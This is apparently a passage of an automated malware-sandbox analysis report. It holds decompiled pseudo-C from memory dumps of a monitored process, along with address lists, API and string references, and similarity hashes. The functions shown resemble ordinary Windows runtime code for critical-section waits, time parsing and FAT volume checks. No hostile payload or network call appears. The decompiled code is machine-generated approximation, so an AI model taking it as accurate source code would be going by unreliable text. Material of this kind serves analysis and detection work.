					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x023753ab
0x023753ae
0x023753b1
0x023753b4
0x023753b7
0x023905b6
0x023905c0
0x023905c3
0x00000000
0x023905c9
0x023905c9
0x023905cc
0x023905d5
0x023905d5
0x023753bd
0x023753bd
0x023753bd
0x023753be
0x023753be
0x023753be
0x023753c0
0x00000000
0x00000000
0x023b2269
0x023b226d
0x023b2349
0x023b234d
0x023b2273
0x023b2276
0x023b2279
0x023b227e
0x023b2283
0x023b2287
0x023b228a
0x023b228d
0x023b228f
0x023b22bc
0x023b22bc
0x023b22bc
0x023b22be
0x023b22c4
0x023b22cc
0x023b22d0
0x023b22d6
0x023b22d7
0x023b22da
0x023b22df
0x023b22e4
0x00000000
0x00000000
0x023b22e6
0x023b22e9
0x023b22f4
0x023b22f9
0x023b22fa
0x023b2305
0x023b2314
0x023b2319
0x023b231a
0x023b231d
0x023b2320
0x023b2323
0x023b2323
0x023b2328
0x023b232d
0x023b232f
0x023b2331
0x023b2336
0x023b2336
0x023b233b
0x023b233d
0x023b2350
0x023b2351
0x023b2356
0x023b2359
0x023b2359
0x023b235b
0x023b235d
0x02375367
0x0237536b
0x02375372
0x00000000
0x00000000
0x00000000
0x00000000
0x023b2363
0x023b2363
0x023b2369
0x023b236a
0x023b236c
0x023b2371
0x023b2373
0x00000000
0x023b2379
0x023b2379
0x023b237a
0x023b237f
0x023b237f
0x023b2385
0x023b2386
0x023b2389
0x023b238e
0x023b2390
0x02375378
0x0237537c
0x023b2396
0x023b2396
0x023b2397
0x023b239c
0x023b23a2
0x023b23a3
0x023b23a6
0x023b23ab
0x023b23ad
0x00000000
0x023b23b3
0x023b23b3
0x023b23b4
0x023b23b9
0x023b23ba
0x023b23ba
0x023b23bc
0x023b23bf
0x00000000
0x00000000
0x023a9153
0x023a9158
0x023a915a
0x023a915e
0x023a9160
0x00000000
0x023a9166
0x023a9166
0x023a9171
0x023a9176
0x023a9176
0x00000000
0x023a9160
0x023b23c6
0x023b23cb
0x023b23d7
0x023b23d7
0x023b23ad
0x023b2390
0x023b2373
0x023b233f
0x023b233f
0x00000000
0x023b233f
0x023b2291
0x023b2291
0x023b2293
0x023b2295
0x023b229a
0x023b22a1
0x023b22a3
0x023b22a7
0x023b22a9
0x00000000
0x00000000
0x023b22ab
0x023b22ad
0x023b22af
0x00000000
0x00000000
0x00000000
0x023b22af
0x023b22b1
0x023b22b4
0x023b22b4
0x023b22b6
0x00000000
0x00000000
0x00000000
0x00000000
0x023b22b6
0x023b228f
0x00000000
0x023b226d
0x023753cb
0x023753ce
0x023753d0
0x023753d4
0x023753d6
0x00000000
0x023753d8
0x023753e3
0x023753ea
0x023753ea
0x023753d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023B22F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023B22FC
RTL: Resource at %p, xrefs: 023B230B
RTL: Re-Waiting, xrefs: 023B2328

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: dbc7db733fd87c137160b90c8ae671d9db61cdb85f4e8cda53e29741ea13aabd
Instruction ID: b63ba1b60e6be1788e474bd26cce4553da25a18a7a1425477fe85188dba68192
Opcode Fuzzy Hash: dbc7db733fd87c137160b90c8ae671d9db61cdb85f4e8cda53e29741ea13aabd
Instruction Fuzzy Hash: A451E4716007016BEF359F68DC80FA773E9EF49324F104669FE09DB690EB65E8418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 4A74C391, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E4A74C391(intOrPtr _a4, wchar_t* _a8, intOrPtr _a12) {
				signed int _v8;
				char _v20;
				signed int _v24;
				void* _v28;
				intOrPtr _v32;
				signed short* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				void* _t41;
				wchar_t* _t42;
				void* _t47;
				int _t52;
				signed int _t56;
				signed int _t57;
				short* _t58;
				signed int _t59;
				long _t63;
				void _t64;
				signed int _t68;
				wchar_t* _t72;
				long _t74;
				void* _t75;
				signed int _t79;
				void* _t83;
				signed short* _t85;
				intOrPtr _t88;
				void* _t93;
				void* _t94;
				void* _t95;
				signed int _t97;
				signed int _t98;
				void* _t99;

				_t38 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t38 ^ _t98;
				_t72 = _a8;
				asm("movsd");
				asm("movsd");
				_t41 = _a4 + 8;
				_v24 = _v24 & 0x00000000;
				asm("movsw");
				_v32 = _a12;
				_v36 = _t41;
				_v28 = _t41;
				_t93 = 2;
				do {
					_t42 = _t72;
					_t90 =  &(_t42[0]);
					do {
						_t74 =  *_t42;
						_t42 = _t42 + _t93;
					} while (_t74 != 0);
					_t97 = _t42 - _t90 >> 1;
					if(_t97 > _t93 || iswdigit( *_t72 & 0x0000ffff) == 0) {
						break;
					} else {
						_t63 = _t72[0] & 0x0000ffff;
						if(_t63 == 0 || iswdigit(_t63) != 0) {
							_t64 = wcstol(_t72, 0, 0xa);
							_v28 = _v28 + _t93;
							_t72 = _t72 + 2 + _t97 * 2;
							 *_v28 = _t64;
							_t65 =  *_t72 & 0x0000ffff;
							_t99 = _t99 + 0xc;
							if(( *_t72 & 0x0000ffff) == 0) {
								L29:
								_v24 = _v24 + 1;
								_t75 = 4;
								if(_v24 < _t75) {
									_t94 = _v28;
									_t90 = 0 << 0x10;
									_t79 = _t75 - _v24 >> 1;
									_t52 = memset(_t94, 0xbadbad, _t79 << 2);
									_t95 = _t94 + _t79;
									asm("adc ecx, ecx");
									memset(_t95, _t52, 0);
									_t93 = _t95;
								}
								_t47 = 1;
								L32:
								return E4A7313A9(_t47, _t72, _v8 ^ _t98, _t90, _t93, _t97);
							}
							if(E4A7318EB( &_v20, _t65) != 0) {
								L17:
								_t56 =  *_t72 & 0x0000ffff;
								if(_t56 == 0x70 || _t56 == 0x50) {
									_t83 = 1;
								} else {
									_t83 = 0;
								}
								_t57 =  *_t72 & 0x0000ffff;
								if(_t57 == 0 || _t57 == 0x6d || _t57 == 0x4d) {
									if(_t83 == 0) {
										_t58 = _v36;
										if( *_t58 == 0xc) {
											 *_t58 = 0;
										}
									} else {
										_t85 = _v36;
										_t59 =  *_t85 & 0x0000ffff;
										if(_t59 != 0xc) {
											 *_t85 = _t59 + 0xc;
										}
									}
									goto L29;
								} else {
									L11:
									_t47 = 0;
									goto L32;
								}
							}
							_t68 =  *_t72 & 0x0000ffff;
							if(_v24 >= _t93) {
								_t88 = _v32;
								if(_t68 ==  *((intOrPtr*)(_t88 + 2)) || _t68 ==  *((intOrPtr*)(_t88 + 6))) {
									goto L14;
								} else {
									goto L11;
								}
							}
							if(E4A7318EB(_v32, _t68) != 0) {
								goto L14;
							}
							goto L11;
						} else {
							break;
						}
					}
					L14:
					_v24 = _v24 + 1;
					_t72 = E4A73413B(_t72);
				} while (_v24 < 4);
				_t45 =  *_t72 & 0x0000ffff;
				if(( *_t72 & 0x0000ffff) == 0) {
					goto L29;
				}
				if(E4A7318EB( &_v20, _t45) == 0) {
					goto L11;
				}
				goto L17;
			}

0x4a74c399
0x4a74c3a0
0x4a74c3aa
0x4a74c3b7
0x4a74c3b8
0x4a74c3b9
0x4a74c3bc
0x4a74c3c2
0x4a74c3c4
0x4a74c3c7
0x4a74c3ca
0x4a74c3cd
0x4a74c3ce
0x4a74c3ce
0x4a74c3d0
0x4a74c3d3
0x4a74c3d3
0x4a74c3d6
0x4a74c3d8
0x4a74c3e1
0x4a74c3e5
0x00000000
0x4a74c3fe
0x4a74c3fe
0x4a74c405
0x4a74c418
0x4a74c421
0x4a74c424
0x4a74c428
0x4a74c42b
0x4a74c42e
0x4a74c434
0x4a74c4f1
0x4a74c4f1
0x4a74c4f6
0x4a74c4fa
0x4a74c4ff
0x4a74c509
0x4a74c50e
0x4a74c510
0x4a74c510
0x4a74c512
0x4a74c514
0x4a74c514
0x4a74c514
0x4a74c519
0x4a74c51a
0x4a74c528
0x4a74c528
0x4a74c446
0x4a74c49e
0x4a74c49e
0x4a74c4a5
0x4a74c4b3
0x4a74c4ad
0x4a74c4ad
0x4a74c4ad
0x4a74c4b7
0x4a74c4bd
0x4a74c4cd
0x4a74c4e3
0x4a74c4ea
0x4a74c4ee
0x4a74c4ee
0x4a74c4cf
0x4a74c4cf
0x4a74c4d2
0x4a74c4d9
0x4a74c4de
0x4a74c4de
0x4a74c4d9
0x00000000
0x4a74c45d
0x4a74c45d
0x4a74c45d
0x00000000
0x4a74c45d
0x4a74c4bd
0x4a74c44b
0x4a74c44e
0x4a74c464
0x4a74c46b
0x00000000
0x00000000
0x00000000
0x00000000
0x4a74c46b
0x4a74c45b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x4a74c405
0x4a74c473
0x4a74c473
0x4a74c480
0x4a74c480
0x4a74c488
0x4a74c48e
0x00000000
0x00000000
0x4a74c49c
0x00000000
0x00000000
0x00000000

APIs

iswdigit.MSVCRT ref: 4A74C3EF
iswdigit.MSVCRT ref: 4A74C408
wcstol.MSVCRT ref: 4A74C418

Strings

aApP, xrefs: 4A74C3AF

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: iswdigit$wcstol
String ID: aApP
API String ID: 644763121-2547155087
Opcode ID: 0899b650b84909d18298231dc20e1af31ebf414ae6139e7b78b06dcff7783852
Instruction ID: 6fd4dba2f406e7cdc06674605adab910af8ddab64e9a6574bc0770084103523b
Opcode Fuzzy Hash: 0899b650b84909d18298231dc20e1af31ebf414ae6139e7b78b06dcff7783852
Instruction Fuzzy Hash: E1511375A052168ADF60CBACC9416FE7FB8EF05351F52422AED42EB181E734C90AC771

Uniqueness

Uniqueness Score: -1.00%

Function 0237EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0237EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0236DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x243793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E023516C0(_t39);
				} else {
					_t40 = E0234F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02393915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E023501A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x243793c; // 0x0
								_push(_t85);
								_t44 = E02351F28(_t71);
							} else {
								_t44 = E0234F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02393915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E023D2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0237EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02394FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E023A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E023A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x24320c0;
								if(_t85 != 0x24320c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E023D217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E023A3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0237ec56
0x0237ec56
0x0237ec56
0x0237ec5c
0x0237ec64
0x023b23e6
0x023b23eb
0x023b23eb
0x0237ec6a
0x0237ec6c
0x0237ec6f
0x023b23f3
0x023b23f8
0x023b23fa
0x023b23fc
0x0237ec75
0x0237ec76
0x0237ec76
0x0237ec7b
0x0237ec7c
0x0237ec7e
0x023b2406
0x023b2407
0x023b240c
0x023b240d
0x023b240d
0x023b240d
0x023b2414
0x023b2417
0x023b241e
0x023b2435
0x023b2438
0x023b243c
0x023b243f
0x023b2442
0x023b2443
0x023b2446
0x023b2449
0x023b2453
0x023b2455
0x023b245b
0x023b245b
0x0237eb99
0x0237eb99
0x0237eb9c
0x0237eb9d
0x0237eb9f
0x0237eba2
0x023b2465
0x023b246b
0x023b246d
0x0237eba8
0x0237eba9
0x0237eba9
0x0237ebae
0x0237ebb3
0x0237ebb9
0x0237ebbb
0x023b2513
0x023b2514
0x023b2519
0x023b251b
0x0237ec2a
0x0237ec2d
0x0237ec33
0x0237ec36
0x0237ec3a
0x0237ec3e
0x0237ec40
0x0237ec47
0x0237ec47
0x0237ec40
0x023522c6
0x0237ebc1
0x0237ebc1
0x0237ebc5
0x0237ec9a
0x0237ec9a
0x0237ebd6
0x0237ebd6
0x00000000
0x0237ebbb
0x023b2477
0x023b247c
0x023b2486
0x023b248b
0x023b2496
0x023b249b
0x023b249d
0x023b24a0
0x023b24a3
0x023b24aa
0x023b24aa
0x023b24a5
0x023b24a5
0x023b24a5
0x023b24ac
0x023b24af
0x023b24b0
0x023b24b3
0x023b24b9
0x023b24ba
0x023b24bb
0x023b24c6
0x023b24cb
0x023b24cd
0x023b24d0
0x023b24d1
0x023b24d4
0x023b24d6
0x023b24d9
0x023b24d9
0x023b24dc
0x023b24df
0x023b24e1
0x023b24e7
0x023b24e9
0x023b24ec
0x023b24ef
0x023b24f2
0x023b24f2
0x023b24ef
0x023b24e7
0x023b24fa
0x023b24ff
0x023b2501
0x023b2503
0x023b2506
0x023b250b
0x0237eb8c
0x0237eb93
0x00000000
0x00000000
0x0237eb93
0x00000000
0x0237eb99
0x0237ec85
0x0237ec85
0x0237ec85
0x00000000

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023B24BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 023B248D
RTL: Re-Waiting, xrefs: 023B24FA

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 9e64af4ae8ed36ef288cdc2085d6f6d5f7a9fef61d89e763e9081317d3445e61
Instruction ID: 8e67ec912e5124709e768711c6186134c417b6716f8214e27d9209359095b486
Opcode Fuzzy Hash: 9e64af4ae8ed36ef288cdc2085d6f6d5f7a9fef61d89e763e9081317d3445e61
Instruction Fuzzy Hash: FE41C0B0600204ABDB34DF68DC85FAB77AAEF45320F108745FA599BAD1D734E9418B61

Uniqueness

Uniqueness Score: -1.00%

Function 4A73C1E2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E4A73C1E2(void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v528;
				signed short* _v532;
				void* __ebx;
				void* __esi;
				signed int _t15;
				signed short* _t19;
				signed short* _t25;
				signed int _t37;
				signed short* _t42;
				signed short _t49;
				signed short _t50;
				signed short* _t56;
				long _t57;
				signed short* _t59;
				signed short* _t63;
				signed int _t66;
				char _t67;

				_t58 = __edi;
				_t15 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t15 ^ _t66;
				_t67 =  *0x4a754081; // 0x0
				_t42 = E4A7322CA( *((intOrPtr*)(_a4 + 0x3c)), E4A733AFC, (0 | _t67 != 0x00000000) + 2);
				_v532 = _t42;
				if( *0x4a754081 != 0) {
					_t63 = _t42;
					if( *_t42 != 0) {
						_push(__edi);
						while(1) {
							L11:
							_t37 =  *_t42 & 0x0000ffff;
							 *_t63 = _t37;
							if(_t37 != 0) {
								break;
							}
							_t42 =  &(_t42[1]);
							while(1) {
								_t9 = _t63 - 2; // -4
								_t59 = _t9;
								if(iswspace( *_t59 & 0x0000ffff) == 0) {
									break;
								}
								_t63 = _t59;
							}
							 *_t63 = 0;
							_t63 =  &(_t63[1]);
							if( *_t42 != 0) {
								continue;
							}
							_t42 = _v532;
							_pop(_t58);
							goto L2;
						}
						_t42 =  &(_t42[1]);
						_t63 =  &(_t63[1]);
						goto L11;
					}
					L2:
					 *_t63 = 0;
				}
				_t19 = _t42;
				_t7 =  &(_t19[1]); // 0x2
				_t56 = _t7;
				do {
					_t49 =  *_t19;
					_t19 =  &(_t19[1]);
				} while (_t49 != 0);
				E4A73185A(_t42, (_t19 - _t56 >> 1) + 1, E4A732598(_t49, _t42));
				_t57 =  *_t42 & 0x0000ffff;
				if(_t57 != 0) {
					_t25 = _t42;
					_t11 =  &(_t25[1]); // 0x2
					_t62 = _t11;
					do {
						_t50 =  *_t25;
						_t25 =  &(_t25[1]);
					} while (_t50 != 0);
					_t28 = _t25 - _t62 >> 1;
					if(_t25 - _t62 >> 1 == 2) {
						if(_t42[1] != 0x3a) {
							goto L20;
						} else {
							_t28 = iswalpha(_t57);
							_pop(_t50);
							if(_t28 == 0) {
								goto L20;
							} else {
								E4A732C56(_t42, _t57, _t58,  &_v528, 0x104,  *_t42 & 0x0000ffff);
								_push( &_v528);
								goto L7;
							}
						}
					} else {
						L20:
						 *0x4a754188 = E4A740511(_t28, _t50, _t58, _t42);
					}
				} else {
					_t62 = 0x4a755260;
					E4A732C56(_t42, _t57, _t58, 0x4a755260, 0x104, 0);
					_push(0x4a755260);
					L7:
					_push(L"%s\r\n");
					E4A7358F3();
					 *0x4a754188 =  *0x4a754188 & 0x00000000;
				}
				return E4A7313A9(0, _t42, _v8 ^ _t66, _t57, _t58, _t62);
			}

0x4a73c1e2
0x4a73c1ed
0x4a73c1f4
0x4a73c1fc
0x4a73c21e
0x4a73c220
0x4a73c226
0x4a73c22c
0x4a73c22e
0x4a74049c
0x4a7404a3
0x4a7404a3
0x4a7404a3
0x4a7404a6
0x4a7404ac
0x00000000
0x00000000
0x4a7404b5
0x4a7404b6
0x4a7404b6
0x4a7404b6
0x4a7404c6
0x00000000
0x00000000
0x4a74049f
0x4a74049f
0x4a7404ca
0x4a7404ce
0x4a7404d2
0x00000000
0x00000000
0x4a7404d4
0x4a7404da
0x00000000
0x4a7404da
0x4a7404af
0x4a7404b1
0x00000000
0x4a7404b1
0x4a73c234
0x4a73c236
0x4a73c236
0x4a73c239
0x4a73c23b
0x4a73c23b
0x4a73c23e
0x4a73c23e
0x4a73c242
0x4a73c243
0x4a73c258
0x4a73c25d
0x4a73c263
0x4a7404e0
0x4a7404e2
0x4a7404e2
0x4a7404e5
0x4a7404e5
0x4a7404e9
0x4a7404ea
0x4a7404f1
0x4a7404f6
0x4a74819d
0x00000000
0x4a7481a3
0x4a7481a4
0x4a7481aa
0x4a7481ad
0x00000000
0x4a7481b3
0x4a7481c3
0x4a7481ce
0x00000000
0x4a7481ce
0x4a7481ad
0x4a7404fc
0x4a7404fc
0x4a740502
0x4a740502
0x4a73c269
0x4a73c270
0x4a73c276
0x4a73c27b
0x4a73c27c
0x4a73c27c
0x4a73c281
0x4a73c286
0x4a73c28f
0x4a73c29e

APIs

Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B

iswspace.MSVCRT ref: 4A7404BD

Strings

:, xrefs: 4A748198
%s, xrefs: 4A73C27C

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: iswspace
String ID: %s$:
API String ID: 2389812497-2429078054
Opcode ID: 2e58908be42baeb46cd2b6bf59ac038c20ca0b90e23ff1276c25f320130b4625
Instruction ID: 8fdeeb53a1a78dd5005eea1216bd9246445d7739c6749b20ae2478df74b14736
Opcode Fuzzy Hash: 2e58908be42baeb46cd2b6bf59ac038c20ca0b90e23ff1276c25f320130b4625
Instruction Fuzzy Hash: 02313AB1959622ABE7709F68CC856E63BBCDF07310F124465E581CB043F6B4C54EC794

Uniqueness

Uniqueness Score: -1.00%

Function 4A7359D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 4A732D9B: iswspace.MSVCRT ref: 4A732DAD

iswspace.MSVCRT ref: 4A7359FE

Strings

off, xrefs: 4A73561A

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: iswspace
String ID: off
API String ID: 2389812497-733764931
Opcode ID: 1f7b176a39327a2886bddce40ec9c5dfe660011e6a176fd4c899560e1ad8807c
Instruction ID: 5357c997d44ab4a1057696ba92164830c35756ed826075440e9838b5481ce1e1
Opcode Fuzzy Hash: 1f7b176a39327a2886bddce40ec9c5dfe660011e6a176fd4c899560e1ad8807c
Instruction Fuzzy Hash: E211993252DE24BEE3709A118C86B872F58DB8D571F134426FA46AA083E5618A8CC3E0

Uniqueness

Uniqueness Score: -1.00%

Function 4A73A1FA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E4A73A1FA(void* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v532;
				char _v1056;
				short _v1580;
				long _v1584;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				long _t29;
				WCHAR* _t30;
				void* _t31;
				void* _t37;
				signed int _t40;

				_t31 = __ebx;
				_t14 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t14 ^ _t40;
				 *0x4a754128 = 0;
				if(E4A73A2C1(_t37, _a4, _a8,  &_v1056, 0x106) == 0) {
					L3:
					_t18 = 0;
					L4:
					return E4A7313A9(_t18, _t31, _v8 ^ _t40, _t37, 0, 0x106);
				}
				E4A73185A( &_v532, 0x106,  &_v1056);
				E4A7320A9(0x106,  &_v532, 0x106, E4A732EC8);
				if(GetVolumeInformationW( &_v532, 0, 0, 0,  &_v1584, 0,  &_v1580, 0x106) == 0) {
					_t29 = GetLastError();
					 *0x4a754128 = _t29;
					if(_t29 == 0x90) {
						 *0x4a754128 = 0;
					}
					goto L3;
				}
				_t30 =  &_v1580;
				__imp___wcsicmp(_t30, "FAT");
				if(_t30 == 0) {
					if(_v1584 != 0xc) {
						goto L3;
					}
					_t18 = 1;
					goto L4;
				}
				goto L3;
			}

0x4a73a1fa
0x4a73a205
0x4a73a20c
0x4a73a227
0x4a73a234
0x4a73a2a0
0x4a73a2a0
0x4a73a2a2
0x4a73a2af
0x4a73a2af
0x4a73a245
0x4a73a257
0x4a73a27e
0x4a74aa10
0x4a74aa16
0x4a74aa20
0x4a74aa26
0x4a74aa26
0x00000000
0x4a74aa20
0x4a73a284
0x4a73a290
0x4a73a29a
0x4a74aa03
0x00000000
0x00000000
0x4a74aa09
0x00000000
0x4a74aa09
0x00000000

APIs

Part of subcall function 4A73A2C1: towupper.MSVCRT ref: 4A73A346

GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000106,?,00000106,4A732EC8,?,00000106,?,00000000,00000000), ref: 4A73A276
_wcsicmp.MSVCRT ref: 4A73A290
GetLastError.KERNEL32 ref: 4A74AA10

Strings

FAT, xrefs: 4A73A28A

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorInformationLastVolume_wcsicmptowupper
String ID: FAT
API String ID: 206573626-238207945
Opcode ID: 76c4871d096e9dcd9472cc6388ba1e2ba43f7f7b22b05f0db3662bfcd5fd57be
Instruction ID: 6412f1ce62e3a01e465db44ee405bb5c48777af7b431d8da85711b859e8c8138
Opcode Fuzzy Hash: 76c4871d096e9dcd9472cc6388ba1e2ba43f7f7b22b05f0db3662bfcd5fd57be
Instruction Fuzzy Hash: 4221C6B2949518AECB70CB61CC49DDB7BBCEBDA320F4240A9E505D7401DA32DA4CCB64

Uniqueness

Uniqueness Score: -1.00%

Function 4A74C936, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E4A74C936(intOrPtr* _a4) {
				intOrPtr* _t7;
				signed int _t9;
				void* _t12;
				intOrPtr* _t13;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t25;
				intOrPtr* _t26;
				signed int _t28;

				_t26 = _a4;
				if(_t26 != 0) {
					_t7 = _t26;
					_t25 = _t7 + 2;
					do {
						_t21 =  *_t7;
						_t7 = _t7 + 2;
					} while (_t21 != 0);
					while(1) {
						_t9 = _t7 - _t25;
